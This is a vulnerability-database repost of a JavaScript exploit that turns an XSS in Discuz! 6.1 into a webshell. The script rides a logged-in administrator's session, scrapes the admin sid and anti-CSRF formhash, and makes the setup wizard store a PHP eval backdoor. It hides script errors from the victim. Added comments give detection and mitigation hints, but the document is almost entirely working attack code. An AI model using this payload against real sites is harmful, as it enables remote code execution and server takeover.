Discuz! 6.1 xss2webshell Exploit
樱木花盗 发表于 2008-11-27 21:28:48
SEBUGID:SSD-20081105251
发布时间:2008-11-26
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
/*
#############################################
Discuz! 6.1 xss2webshell[SODB-2008-10]  Exploit
by 80vul-A
team: http://www.80vul.com
#############################################
*/
// Target URL of the Discuz! 6.1 install. A trailing slash is expected:
// the admincp.php paths below are appended directly to this string.
// Defender's note: this script can only do anything when it executes
// inside a browser that is already logged into the forum's admin panel
// (which is what the "xss2webshell" title refers to) - every request it
// makes rides on that browser's existing session cookies.
var siteurl='http://www.80vul.com/Discuz_6.1.0/';

// Cross-browser XMLHttpRequest construction: native object first, then
// the legacy ActiveX ProgIDs for old Internet Explorer.
var request = false;
        if(window.XMLHttpRequest) {
            request = new XMLHttpRequest();
            if(request.overrideMimeType) {
                request.overrideMimeType('text/xml');
            }
        } else if(window.ActiveXObject) {
            var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
            for(var i=0; i<versions.length; i++) {
                try {
                    request = new ActiveXObject(versions[i]);
                } catch(e) {}
            }
        }
xmlhttp=request;

// Step 1: obtain the admin "sid". The admin frame page is fetched
// synchronously (third argument false) and the sid is scraped out of
// an "action=home&sid=..." link in the returned HTML.
xmlhttp.open("GET", siteurl+"admincp.php?frames=yes", false);
// Firefox 3 cannot use xmlhttp.send(); http://hi.baidu.com/aullik5/blog/item/fd0648fa4ef44762034f564e.html
// thx luoluo@ph4nt0m.org
xmlhttp.send(null);
var echo = xmlhttp.responseText;
var reg = /action=home&sid=([\w\d]+)\" /i;
var arr=reg.exec(echo);
if(!arr){
// Not logged into the admin backend. sid is left undefined here, so the
// next request is sent with the literal string "undefined" as the sid.
//alert(document.cookie);
}else{
var sid=arr[1];
}

// Step 2: obtain the formhash (presumably Discuz's anti-CSRF form token)
// by loading the admin home page and scraping the hidden input value.
// Defender's note: because the token is read straight out of the HTML
// response, a per-form token does not protect against script that is
// already running in the admin's origin - only removing the XSS sink
// (output encoding) does.
xmlhttp.open("GET", siteurl+"admincp.php?action=home&sid="+sid, false);
xmlhttp.send(null);
var echo = xmlhttp.responseText;
var reg = / name=\"formhash\" value=\"([\w\d]+)\"/i;
var arr=reg.exec(echo);
// Swallow any later script error (e.g. arr being null below) so nothing
// surfaces in the victim's browser.
window.onerror=function(){return true;}
var formhash=arr[1];
//alert(formhash);

// Step 3: write the webshell via SODB-2008-10 (the setup wizard, step 3).
// http://www.80vul.com/dzvul/sodb/10/sodb-2008-10.txt
// The POST body sets settingsnew[bbname] to PHP code; per the referenced
// advisory the wizard presumably persists that setting into a PHP file,
// which is what turns the XSS into a webshell.
// Detection: an admincp.php request with action=runwizard&step=3 whose
// settingsnew[bbname] value contains a PHP open tag, and a forum name or
// config value containing PHP tags on disk.
// Mitigation: apply the vendor fix for SODB-2008-10, encode output at the
// XSS sink, and restrict who can reach admincp.php (e.g. by source IP).
xmlhttp.open("POST", siteurl+"admincp.php?action=runwizard&step=3", false);
// Referer is set explicitly, presumably to satisfy a server-side referer
// check; browsers typically refuse to let script override this header.
xmlhttp.setRequestHeader("Referer", siteurl);
xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
xmlhttp.send(unescape("settingsnew%5Bbbname%5D=%3C%3F@eval($_POST[cmd])%3A%3F%3E&settingsnew%5Bsitename%5D=Comsenz+Inc.&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=+%CF%C2%D2%BB%B2%BD+&formhash="+formhash));
